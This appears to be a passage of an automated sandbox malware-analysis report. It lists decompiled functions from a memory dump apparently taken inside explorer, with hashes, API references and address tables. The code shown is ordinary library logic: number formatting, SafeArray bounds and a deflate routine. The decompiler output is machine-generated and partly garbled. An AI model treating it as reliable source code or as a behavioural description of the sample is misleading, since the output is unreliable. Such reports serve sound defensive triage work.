                                                                                                                                                                        • Opcode Fuzzy Hash: c9c260d43bb958897c1676aece40122ed2497c5082e623f19fe9357f2320f37d
                                                                                                                                                                        • Instruction Fuzzy Hash: 41212C70600289BBDB249B66DC4DE5BBF7CEFC7B25F10825CB615E6290D6789A00D670
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007B3379 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                        			E007B3379(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				signed int _t23;
				void* _t30;
				char* _t31;
				char* _t33;
				char* _t35;
				char* _t37;
				char* _t38;
				long long* _t40;

				_t30 = __edi;
				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t35 = _a4;
				_push(_t25);
				 *_t40 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t35);
				L007B34D2();
				_t23 = _t12;
				if(_t23 < 0 || _t23 >= _a8) {
					L16:
					_t13 = _t12 | 0xffffffff;
					goto L17;
				} else {
					E007B3352(_t12, _t35);
					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
						L8:
						_push(_t30);
						_t37 = strchr(_t35, 0x65);
						_t31 = _t37;
						if(_t37 == 0) {
							L15:
							_t13 = _t23;
							L17:
							return _t13;
						}
						_t38 = _t37 + 1;
						_t33 = _t31 + 2;
						if( *_t38 == 0x2d) {
							_t38 = _t33;
						}
						while( *_t33 == 0x30) {
							_t33 = _t33 + 1;
						}
						if(_t33 != _t38) {
							E007A8CE0(_t38, _t33, _t23 - _t33 + _a4);
							_t23 = _t23 + _t38 - _t33;
						}
						goto L15;
					} else {
						_t6 = _t23 + 3; // 0x7b1b64
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L16;
						}
						_t35[_t23] = 0x302e;
						( &(_t35[2]))[_t23] = 0;
						_t23 = _t23 + 2;
						goto L8;
					}
				}
			}













                                                                                                                                                                        0x007b3379
                                                                                                                                                                        0x007b337c
                                                                                                                                                                        0x007b3381
                                                                                                                                                                        0x007b3385
                                                                                                                                                                        0x007b3385
                                                                                                                                                                        0x007b338b
                                                                                                                                                                        0x007b338f
                                                                                                                                                                        0x007b3390
                                                                                                                                                                        0x007b3393
                                                                                                                                                                        0x007b3394
                                                                                                                                                                        0x007b3399
                                                                                                                                                                        0x007b339c
                                                                                                                                                                        0x007b339d
                                                                                                                                                                        0x007b33a2
                                                                                                                                                                        0x007b33a9
                                                                                                                                                                        0x007b3432
                                                                                                                                                                        0x007b3432
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b33b4
                                                                                                                                                                        0x007b33b5
                                                                                                                                                                        0x007b33c7
                                                                                                                                                                        0x007b33ed
                                                                                                                                                                        0x007b33ed
                                                                                                                                                                        0x007b33f6
                                                                                                                                                                        0x007b33f8
                                                                                                                                                                        0x007b33fe
                                                                                                                                                                        0x007b342d
                                                                                                                                                                        0x007b342d
                                                                                                                                                                        0x007b3435
                                                                                                                                                                        0x007b3438
                                                                                                                                                                        0x007b3438
                                                                                                                                                                        0x007b3400
                                                                                                                                                                        0x007b3401
                                                                                                                                                                        0x007b3407
                                                                                                                                                                        0x007b3409
                                                                                                                                                                        0x007b3409
                                                                                                                                                                        0x007b340e
                                                                                                                                                                        0x007b340d
                                                                                                                                                                        0x007b340d
                                                                                                                                                                        0x007b3415
                                                                                                                                                                        0x007b3421
                                                                                                                                                                        0x007b342b
                                                                                                                                                                        0x007b342b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b33d7
                                                                                                                                                                        0x007b33d7
                                                                                                                                                                        0x007b33d7
                                                                                                                                                                        0x007b33dd
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b33df
                                                                                                                                                                        0x007b33e5
                                                                                                                                                                        0x007b33ea
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b33ea
                                                                                                                                                                        0x007b33c7

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strchr$_snprintf
                                                                                                                                                                        • String ID: %.*g
                                                                                                                                                                        • API String ID: 3619936089-952554281
                                                                                                                                                                        • Opcode ID: adcecd7e12ca0ed9c33bc635c3d3a4e7797b90d478cde49d54e18a93abca712d
                                                                                                                                                                        • Instruction ID: c80dcbf769f5974ee761d24bff0f83071fe1f4392b6151aedfb54aed4d0910c5
                                                                                                                                                                        • Opcode Fuzzy Hash: adcecd7e12ca0ed9c33bc635c3d3a4e7797b90d478cde49d54e18a93abca712d
                                                                                                                                                                        • Instruction Fuzzy Hash: 1E2132626446947ADB324A28DC86FEB3B88AF013A0F184125F9449B181EAADDFD443A0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007AE92E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 007AE963
                                                                                                                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 007AE972
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ArrayBoundSafe
                                                                                                                                                                        • String ID: z
                                                                                                                                                                        • API String ID: 62119774-3404383249
                                                                                                                                                                        • Opcode ID: 796bb165decc8d8bd82f3cdaedd1b757c7167d48cee4eb04fee3634c05f0f4c5
                                                                                                                                                                        • Instruction ID: bd7a5deb3ebdd382e6e31b3523bc994e6b605b047dde88f0fa960ef1c3ca4fb8
                                                                                                                                                                        • Opcode Fuzzy Hash: 796bb165decc8d8bd82f3cdaedd1b757c7167d48cee4eb04fee3634c05f0f4c5
                                                                                                                                                                        • Instruction Fuzzy Hash: F731F432E1021AAFEF24DB94CC46BFEB779BB46700F148652E205B2141D778AA809791
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007B4100 Relevance: 6.6, APIs: 5, Instructions: 341COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 99%
                                                                                                                                                                        			E007B4100(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0xfed1e900
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0xbde85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E007B7120(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E007B5E80(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0xbde85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E007B5FC0( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0x8341ffff
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xed7505f9
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0xbde85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0x8341ffff
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E007B5FC0(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0xfed1e900
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0xbde85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0xbde85000
							E007B7120(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E007B5E80( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0xbde85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}






















































                                                                                                                                                                        0x007b4106
                                                                                                                                                                        0x007b410b
                                                                                                                                                                        0x007b410f
                                                                                                                                                                        0x007b4112
                                                                                                                                                                        0x007b4112
                                                                                                                                                                        0x007b4115
                                                                                                                                                                        0x007b411a
                                                                                                                                                                        0x007b411f
                                                                                                                                                                        0x007b4122
                                                                                                                                                                        0x007b4127
                                                                                                                                                                        0x007b412a
                                                                                                                                                                        0x007b4130
                                                                                                                                                                        0x007b4130
                                                                                                                                                                        0x007b413b
                                                                                                                                                                        0x007b413e
                                                                                                                                                                        0x007b4145
                                                                                                                                                                        0x007b414a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b4150
                                                                                                                                                                        0x007b4155
                                                                                                                                                                        0x007b4155
                                                                                                                                                                        0x007b415a
                                                                                                                                                                        0x007b4160
                                                                                                                                                                        0x007b416a
                                                                                                                                                                        0x007b416f
                                                                                                                                                                        0x007b4175
                                                                                                                                                                        0x007b4194
                                                                                                                                                                        0x007b4197
                                                                                                                                                                        0x007b41a2
                                                                                                                                                                        0x007b41a2
                                                                                                                                                                        0x007b41a2
                                                                                                                                                                        0x007b4199
                                                                                                                                                                        0x007b4199
                                                                                                                                                                        0x007b419b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b419d
                                                                                                                                                                        0x007b419d
                                                                                                                                                                        0x007b419d
                                                                                                                                                                        0x007b419b
                                                                                                                                                                        0x007b41aa
                                                                                                                                                                        0x007b41af
                                                                                                                                                                        0x007b41b4
                                                                                                                                                                        0x007b41ba
                                                                                                                                                                        0x007b41be
                                                                                                                                                                        0x007b41c1
                                                                                                                                                                        0x007b41c4
                                                                                                                                                                        0x007b41ca
                                                                                                                                                                        0x007b41cf
                                                                                                                                                                        0x007b41d2
                                                                                                                                                                        0x007b41d8
                                                                                                                                                                        0x007b41dd
                                                                                                                                                                        0x007b41e3
                                                                                                                                                                        0x007b41e9
                                                                                                                                                                        0x007b41ee
                                                                                                                                                                        0x007b41f1
                                                                                                                                                                        0x007b41f6
                                                                                                                                                                        0x007b41fa
                                                                                                                                                                        0x007b41fe
                                                                                                                                                                        0x007b4201
                                                                                                                                                                        0x007b4204
                                                                                                                                                                        0x007b420d
                                                                                                                                                                        0x007b4214
                                                                                                                                                                        0x007b4217
                                                                                                                                                                        0x007b421a
                                                                                                                                                                        0x007b421f
                                                                                                                                                                        0x007b4224
                                                                                                                                                                        0x007b4227
                                                                                                                                                                        0x007b422a
                                                                                                                                                                        0x007b422a
                                                                                                                                                                        0x007b422e
                                                                                                                                                                        0x007b4237
                                                                                                                                                                        0x007b423e
                                                                                                                                                                        0x007b4241
                                                                                                                                                                        0x007b4246
                                                                                                                                                                        0x007b424b
                                                                                                                                                                        0x007b424b
                                                                                                                                                                        0x007b424e
                                                                                                                                                                        0x007b4253
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b4177
                                                                                                                                                                        0x007b4179
                                                                                                                                                                        0x007b4186
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b4186
                                                                                                                                                                        0x007b4179
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b4175
                                                                                                                                                                        0x007b4259
                                                                                                                                                                        0x007b425e
                                                                                                                                                                        0x007b4261
                                                                                                                                                                        0x007b4264
                                                                                                                                                                        0x007b430f
                                                                                                                                                                        0x007b430f
                                                                                                                                                                        0x007b426a
                                                                                                                                                                        0x007b426a
                                                                                                                                                                        0x007b426a
                                                                                                                                                                        0x007b426f
                                                                                                                                                                        0x007b4299
                                                                                                                                                                        0x007b429c
                                                                                                                                                                        0x007b429c
                                                                                                                                                                        0x007b42a1
                                                                                                                                                                        0x007b42a3
                                                                                                                                                                        0x007b42a5
                                                                                                                                                                        0x007b42a8
                                                                                                                                                                        0x007b42ab
                                                                                                                                                                        0x007b42b3
                                                                                                                                                                        0x007b42b8
                                                                                                                                                                        0x007b42b8
                                                                                                                                                                        0x007b42be
                                                                                                                                                                        0x007b42c1
                                                                                                                                                                        0x007b42c4
                                                                                                                                                                        0x007b42c7
                                                                                                                                                                        0x007b42c9
                                                                                                                                                                        0x007b42c9
                                                                                                                                                                        0x007b42ca
                                                                                                                                                                        0x007b42ca
                                                                                                                                                                        0x007b42c7
                                                                                                                                                                        0x007b42d8
                                                                                                                                                                        0x007b42db
                                                                                                                                                                        0x007b42df
                                                                                                                                                                        0x007b42e4
                                                                                                                                                                        0x007b42e7
                                                                                                                                                                        0x007b42ea
                                                                                                                                                                        0x007b42ea
                                                                                                                                                                        0x007b42ea
                                                                                                                                                                        0x007b42ed
                                                                                                                                                                        0x007b42ed
                                                                                                                                                                        0x007b42f0
                                                                                                                                                                        0x007b42f0
                                                                                                                                                                        0x007b4271
                                                                                                                                                                        0x007b4271
                                                                                                                                                                        0x007b4281
                                                                                                                                                                        0x007b4284
                                                                                                                                                                        0x007b4289
                                                                                                                                                                        0x007b4289
                                                                                                                                                                        0x007b428c
                                                                                                                                                                        0x007b428f
                                                                                                                                                                        0x007b4292
                                                                                                                                                                        0x007b4294
                                                                                                                                                                        0x007b4294
                                                                                                                                                                        0x007b42f3
                                                                                                                                                                        0x007b42f5
                                                                                                                                                                        0x007b42f8
                                                                                                                                                                        0x007b42f8
                                                                                                                                                                        0x007b42fe
                                                                                                                                                                        0x007b4302
                                                                                                                                                                        0x007b4305
                                                                                                                                                                        0x007b4307
                                                                                                                                                                        0x007b4307
                                                                                                                                                                        0x007b4318
                                                                                                                                                                        0x007b431a
                                                                                                                                                                        0x007b431a
                                                                                                                                                                        0x007b4322
                                                                                                                                                                        0x007b4330
                                                                                                                                                                        0x007b4333
                                                                                                                                                                        0x007b4335
                                                                                                                                                                        0x007b4355
                                                                                                                                                                        0x007b4355
                                                                                                                                                                        0x007b4358
                                                                                                                                                                        0x007b435e
                                                                                                                                                                        0x007b435f
                                                                                                                                                                        0x007b4362
                                                                                                                                                                        0x007b4364
                                                                                                                                                                        0x007b4367
                                                                                                                                                                        0x007b436a
                                                                                                                                                                        0x007b436d
                                                                                                                                                                        0x007b4371
                                                                                                                                                                        0x007b4374
                                                                                                                                                                        0x007b4377
                                                                                                                                                                        0x007b437a
                                                                                                                                                                        0x007b437c
                                                                                                                                                                        0x007b437c
                                                                                                                                                                        0x007b437f
                                                                                                                                                                        0x007b4381
                                                                                                                                                                        0x007b4381
                                                                                                                                                                        0x007b4384
                                                                                                                                                                        0x007b4386
                                                                                                                                                                        0x007b4389
                                                                                                                                                                        0x007b4391
                                                                                                                                                                        0x007b4394
                                                                                                                                                                        0x007b4399
                                                                                                                                                                        0x007b4399
                                                                                                                                                                        0x007b439f
                                                                                                                                                                        0x007b43a2
                                                                                                                                                                        0x007b43a5
                                                                                                                                                                        0x007b43a7
                                                                                                                                                                        0x007b43a7
                                                                                                                                                                        0x007b43a8
                                                                                                                                                                        0x007b43a8
                                                                                                                                                                        0x007b43b3
                                                                                                                                                                        0x007b43b3
                                                                                                                                                                        0x007b43b3
                                                                                                                                                                        0x007b43b6
                                                                                                                                                                        0x007b43b9
                                                                                                                                                                        0x007b43b9
                                                                                                                                                                        0x007b43bc
                                                                                                                                                                        0x007b43bc
                                                                                                                                                                        0x007b437f
                                                                                                                                                                        0x007b43bf
                                                                                                                                                                        0x007b43c2
                                                                                                                                                                        0x007b43c5
                                                                                                                                                                        0x007b43c7
                                                                                                                                                                        0x007b43ca
                                                                                                                                                                        0x007b43cc
                                                                                                                                                                        0x007b43cf
                                                                                                                                                                        0x007b43d2
                                                                                                                                                                        0x007b43d4
                                                                                                                                                                        0x007b43d7
                                                                                                                                                                        0x007b43df
                                                                                                                                                                        0x007b43e7
                                                                                                                                                                        0x007b43ea
                                                                                                                                                                        0x007b43ea
                                                                                                                                                                        0x007b43ea
                                                                                                                                                                        0x007b43ed
                                                                                                                                                                        0x007b43ed
                                                                                                                                                                        0x007b43ed
                                                                                                                                                                        0x007b43f0
                                                                                                                                                                        0x007b43f6
                                                                                                                                                                        0x007b43f8
                                                                                                                                                                        0x007b43f8
                                                                                                                                                                        0x007b43fe
                                                                                                                                                                        0x007b4404
                                                                                                                                                                        0x007b440d
                                                                                                                                                                        0x007b4414
                                                                                                                                                                        0x007b4416
                                                                                                                                                                        0x007b4419
                                                                                                                                                                        0x007b4419
                                                                                                                                                                        0x007b441c
                                                                                                                                                                        0x007b441c
                                                                                                                                                                        0x007b441f
                                                                                                                                                                        0x007b4421
                                                                                                                                                                        0x007b4424
                                                                                                                                                                        0x007b4426
                                                                                                                                                                        0x007b4441
                                                                                                                                                                        0x007b4441
                                                                                                                                                                        0x007b4445
                                                                                                                                                                        0x007b4448
                                                                                                                                                                        0x007b444b
                                                                                                                                                                        0x007b444e
                                                                                                                                                                        0x007b4464
                                                                                                                                                                        0x007b4464
                                                                                                                                                                        0x007b4464
                                                                                                                                                                        0x007b4450
                                                                                                                                                                        0x007b4450
                                                                                                                                                                        0x007b4452
                                                                                                                                                                        0x007b4456
                                                                                                                                                                        0x007b4459
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b445b
                                                                                                                                                                        0x007b445b
                                                                                                                                                                        0x007b445d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b445f
                                                                                                                                                                        0x007b445f
                                                                                                                                                                        0x007b445f
                                                                                                                                                                        0x007b445d
                                                                                                                                                                        0x007b4459
                                                                                                                                                                        0x007b4468
                                                                                                                                                                        0x007b446b
                                                                                                                                                                        0x007b4470
                                                                                                                                                                        0x007b447a
                                                                                                                                                                        0x007b447a
                                                                                                                                                                        0x007b447a
                                                                                                                                                                        0x007b447d
                                                                                                                                                                        0x007b4428
                                                                                                                                                                        0x007b4428
                                                                                                                                                                        0x007b442a
                                                                                                                                                                        0x007b4431
                                                                                                                                                                        0x007b4431
                                                                                                                                                                        0x007b4433
                                                                                                                                                                        0x007b4435
                                                                                                                                                                        0x007b4437
                                                                                                                                                                        0x007b443b
                                                                                                                                                                        0x007b443d
                                                                                                                                                                        0x007b443f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b443f
                                                                                                                                                                        0x007b443b
                                                                                                                                                                        0x007b442c
                                                                                                                                                                        0x007b442c
                                                                                                                                                                        0x007b442f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b442f
                                                                                                                                                                        0x007b442a
                                                                                                                                                                        0x007b4487
                                                                                                                                                                        0x007b4489
                                                                                                                                                                        0x007b4489
                                                                                                                                                                        0x007b4494
                                                                                                                                                                        0x007b4337
                                                                                                                                                                        0x007b4337
                                                                                                                                                                        0x007b433a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b433c
                                                                                                                                                                        0x007b433c
                                                                                                                                                                        0x007b433e
                                                                                                                                                                        0x007b4342
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007b4344
                                                                                                                                                                        0x007b4344
                                                                                                                                                                        0x007b4344
                                                                                                                                                                        0x007b4347
